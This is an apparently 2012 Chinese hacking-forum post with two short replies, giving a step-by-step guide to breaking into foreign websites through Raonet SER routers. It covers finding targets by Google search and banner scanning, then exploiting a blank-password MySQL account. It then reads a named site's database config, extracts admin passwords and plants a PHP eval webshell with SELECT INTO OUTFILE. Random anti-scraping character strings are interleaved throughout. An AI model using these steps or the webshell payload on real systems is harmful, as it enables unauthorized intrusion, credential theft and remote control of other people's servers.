中国网络渗透测试联盟
标题:
利用某路由器漏洞入侵国外站点
[打印本页]
作者:
admin
时间:
2012-12-10 10:30
标题:
利用某路由器漏洞入侵国外站点
寻找存在漏洞的路由器方法:
2 F; h+ I# @& K+ F+ i- p8 f7 `
, l1 y" ?7 N, x. X$ u, ?
1:google搜索'Raonet Subscriber Ethernet Router'
" L* c9 }. b9 b1 y8 _
! j' b6 U* P, N t" b3 N
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
% q, w- Y. o" b4 q8 ^
: Q1 |+ ~* h! N( ]8 I
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
$ \0 C7 o0 s9 d1 J0 N
4 q; M, V! T: f4 h9 B4 L
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
1 R- T9 ?, T- ~
7 T5 }' k* S0 B7 ^) f
* Y. ^3 \) D( e8 @; `/ o% |
" @- F& g: X& B3 d, y i) t/ g2 |
入侵步骤:
* p* }1 ?: h. }( e% w& B i3 O4 \# _
8 {9 Z2 q7 o- g
1.爆web路径,
http://www.yu1u.org/src/jpgraph_line.php
$ {, e" j/ C! m! c! H% Q
; @- F. M/ a5 V# f
2:查看数据库配置文件,
http://www.yu1u.org/inc/conn_db.inc
/ |# l4 w8 h" s
3:得到密码后连接,查看GUI管理密码:
+ |, Q! V$ T, {
use ser_500
9 k5 l* Q! c! `. R
select id,passwd from user;
: ~; ~- N, t7 |7 c8 v5 v
4:通过数据库写入webshell,执行命令:
) M( c L7 s& B
use mysql;
' t4 F0 M6 L% S* o
create table ok(cmd TEXT);
4 _9 l$ o7 J1 f0 }1 H5 h( D
insert into ok values("<?php @eval($_POST[cmd])?>");
4 r$ }* k& v. } V0 B
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
" z" X, Q. X0 {( @2 E! A3 a' P
drop table ok;
+ ?! U; n( _7 H4 X$ ~& T7 m6 p' O; `
6 o1 P! w/ Z; E E
5:连接后门shell.php
+ o6 e9 B! Y2 u6 j$ ]
( ?$ L% x" U1 u0 `$ d
6. 搞定!
/ Y' w0 c: z X0 A, v3 v9 M
' G7 Z& Z+ C$ q6 l4 k' Q& O
作者:
Anthony~
时间:
2013-7-27 20:06
这个后果可以很严重的说
作者:
jos666
时间:
2013-7-29 12:07
不错哦,黑服务器补洞。。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2